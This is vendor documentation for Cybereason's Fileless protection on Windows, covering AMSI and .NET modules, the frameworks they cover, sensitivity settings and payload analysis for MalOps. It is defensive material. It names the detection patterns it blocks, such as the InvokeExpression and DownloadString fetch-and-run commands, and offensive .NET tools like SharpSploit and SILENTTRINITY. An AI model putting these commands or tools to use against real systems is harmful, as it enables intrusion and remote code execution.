Fileless Protection

Recently, more attackers use increasingly sophisticated attack techniques to infiltrate systems through various engines and products. Most successful attacks use fileless malware to infiltrate systems. Because security vendors are monitoring more commonly exploited native system modules and scripts such as PowerShell and .NET, a shift towards other script engines and programs is occurring.

To address this shift, the Cybereason platform integrates the Microsoft Anti-Malware Scan Interface (AMSI) into its Fileless protection suite, in addition to the existing PowerShell and .NET protection modules. AMSI is a versatile interface standard that allows integration with any Anti-Malware product. Integrating Cybereason with AMSI provides visibility, collection, detection, and prevention for various engines and products in their modern versions, which include built-in support for AMSI.

Fileless protection is supported on Windows machines. For details, see Endpoint machine prevention features.

Fileless attack prevention video

Protected frameworks and programs

The Cybereason platform’s Fileless protection suite provides coverage for attacks launched by a number of frameworks and programs.

In addition, the Cybereason platform enables you to select between the AMSI and .NET modules, which allow you to choose the type of protection suitable for your organization. You can select AMSI, .NET, or both modules for full protection. Each of the modules also includes PowerShell protection. For more information about the Fileless protection modules, see Select the Fileless protection module.

The following table provides a list of protected frameworks and programs, and indicates which module includes protection for that program or framework.

Framework/program	Description	Module
PowerShell	Attackers use the legitimate PowerShell module to launch advanced, fileless attacks. NGAV prevents malicious PowerShell commands before the commands can execute, even in cases where an attacker obfuscated the PowerShell command.	AMSI, .NET
.NET	Attackers increasingly exploit the powerful .NET framework. Cybereason can defend against malicious .NET techniques such as DotNetToJScript, .NET floating modules, and tools such as SharpSploit, SILENTTRINITY, and Internal Monologue.	.NET
JScript and VBScript	Attackers use native Windows scripting languages to implement sophisticated, multiple-stage attacks. For example, malicious documents may launch an HTML page containing VBScript code that triggers malicious shellcode. For example, if NGAV exposes these behaviors and identifies the stage where the script needs to supply the scripting engine with plain, unobfuscated code, and can then scan and block this deobfuscated content.	AMSI
Office macros, including Excel 4.0 Macro	Attackers use malicious macros that run within the VBA framework to launch attacks from Office documents. If NGAV detects specific Windows API calls that are considered high risk, it analyzes the macro, and prevents the macro from executing if the macro is deemed malicious.	AMSI
Windows Management Instrumentation (WMI)	Protects against attacks that exploit WMI, a set of Microsoft specifications used for administration of Windows systems. Attackers use WMI to interact with local and remote systems, and to perform that assist discovery and lateral movement, such as gathering information or remote file execution.	AMSI

Detecting fileless attacks

Attackers use various modules, frameworks, and programs to launch advanced, fileless attacks. Attackers can take control of a module, framework, or program in many ways, often without using the relevant process. In many cases, fileless attacks never access the disk, meaning that these attacks can easily elude standard antivirus tools.

NGAV prevents malicious commands before the commands can execute, even in cases where an attacker obfuscated the command. Where relevant, the malicious command or payload is displayed within the MalOp. For PowerShell attacks, see Malicious Command Malop for more information.

Sensitivity level

Note

This feature is available from version 23.1.8x.

In version 23.1.8x and later, the Cybereason platform includes significant enhancements to the Fileless protection feature to provide better stability over time and to accommodate larger environments with numerous exclusions. The following enhancements are included:

• You can set the .NET module Sensitivity level to Basic or Extended mode to tailor Fileless protection to your environment’s needs. The sensitivity levels determine whether the Fileless protection feature protects all PowerShell and .NET apps or only processes with the most security value, such as PowerShell and PowerShell ISE processes.

• You can exclude specific paths from Fileless protection while also using wildcards (Regex based). This capability provides additional control over exclusions.

• The detection/prevention mechanism is less invasive to processes themselves, providing better stability and reducing the risk of application crashes.

Fileless detection and prevention options

The Cybereason platform allows you to control how and which types of attacks are detected.

You can instruct the Cybereason platform to both detect and prevent:

• The use of certain commands, such as InvokeExpression and DownloadString

• Malicious use of scripts

• Floating .NET modules

Note

If you have legitimate processes that might trigger Fileless protection, you can also add exclusions so that Fileless protection does not block legitimate use of these frameworks.

See Set the Fileless Protection Modes to learn how to configure your Fileless protection.

Watch this video for more examples of Fileless protection by EDR and NGAV components.

Fileless detection descriptions

Note

This feature is available on demand in version 23.1.4x and generally available in version 23.1.83 and higher.

Fileless protection MalOps include descriptions for rule-based (pattern) Fileless detection events. Descriptions of the malicious behavior associated with the pattern help analysts better understand the context of the event.

You can view these descriptions in the MalOps details within the top left Description area, and in the Investigation screen, in the Detection event’s properties section.

For example, notice the description provided for the Script_Obfuscation (325) event in the MalOp details screen:

Analyze payload

For Fileless protection MalOps, in cases where the Cybereason platform has captured the attack payload that has triggered the MalOp, analysts can view/download the payload content in order to conduct analysis of it.

To analyze the payload:

1. From the Malop Details screen, click the Process tab.

2. Click the affected process to open the Process details screen.

3. In the Detection Events section, click items in the Contents list.

4. In the PowerShell section, hover over the payload drop down to view the payload on screen, or click Export to download the payload content in a text file for analysis.

Note

Handle payloads with care, as they contain malicious code.

See a full example here: Analyze Payload for Fileless MalOp Example

Related resources

Knowledge base articles

• Fileless (PowerShell and .NET) protection FAQ

• Non-malicious processes blocked by Fileless (PowerShell and .NET protection)

• PowerShell protection conflicts with specific .NET applications

• Is a reboot required before anti-ransomware and PowerShell settings activate?

Videos

• PowerShell protection

• PowerShell protection example

• PowerShell and .NET protection demo

Blog posts

Detecting SilentTrinity with Cybereason (blog)